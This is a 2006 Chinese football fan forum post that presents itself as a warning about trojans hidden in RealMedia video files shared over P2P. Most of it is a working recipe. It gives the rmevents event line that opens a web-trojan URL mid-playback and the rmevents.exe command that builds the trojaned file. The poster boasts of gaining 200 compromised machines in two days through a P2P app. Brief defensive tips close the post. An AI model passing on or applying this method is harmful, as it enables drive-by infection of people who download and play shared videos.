国际米兰

 找回密码
 注册通行证

QQ登录

只需一步,快速开始

搜索
查看: 180|回复: 0
打印 上一主题 下一主题

[警惕]如何防御视频文件中的木马 [复制链接]

(U12)Esordienti

我以我身献MM

Rank: 3Rank: 3Rank: 3

帖子
420
精华
3
CNB
0
注册时间
2005-9-21
跳转到指定楼层
楼主
发表于 2006-2-22 07:11:02 |显示全部楼层 |倒序浏览
分享到:
现在网络上通过P2P技术受益的人越来越多了。于是有些病毒开始通过这个途径来传播。
所以,在使用的时候要提防病毒的侵入。
首先,你要先了解一下木马是怎样通过视频文件传播的。打个比方,在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,我放了一个这样的小 木马 ,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。 使用Helix Producer Plus 9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口. 新建一个文本文件rmevents.txt. 输入: u 00:01:00.0 00:01:30.0http://www.xxxx.com.cn/muma.html 我来解释一下,它意思是说在00:01:00.0 00:01:30.0这个时间范围内打开后面的URL,后面的URL就是我们的 木马 地址。 输入rmevents -i 电影 .rm -e rmevents.txt -o 电影 1.rm 这个命令,生成的 电影 .rm就是我们的 木马 文件了。http://www.xxx.com.cn/muma.html这个地址是你做好的网页 木马 的地址,不管是动鲨 木马 啊,还是EXE2BMP的 木马 ,还是什么CHM 木马 ,还是我崇拜的冰狐大哥的IFRAME溢出的网页 木马 都可以。主要是新,威力强。 大家可以试一下。
防御方法:一,最重要的一点,嘿嘿,别看不健康的东西,对身体不好哦。二,换别的播放器,我推荐梦幻鼎点播放器,贼好用啊。三,看片时用防火墙 屏蔽RealPlayer对网络的访问,但这样做在线看的时候就没保险了。四,最最重要的一点,打完所有的IE补丁。五,如果不怕麻烦,在看影片之前我们可以执行我们做 木马 的那一步,只是把rmevents.txt的内容清空再做,这样就清空了影片的剪辑信息了。 就这么点东西。
分享到: QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
分享分享0 收藏收藏0 顶0 踩0
[GLOW=300,#0000FF,10]我回来了。 都还好吗? [/GLOW]
您需要登录后才可以回帖 登录 | 注册通行证

手机版|Archiver|国际米兰 ( 粤ICP备05005441号 )

GMT+8, 2024-5-31 15:40 , Processed in 0.034909 second(s), 15 queries , Gzip On, Eaccelerator On.

Powered by Discuz! X2

© 2001-2011 Comsenz Inc.

回顶部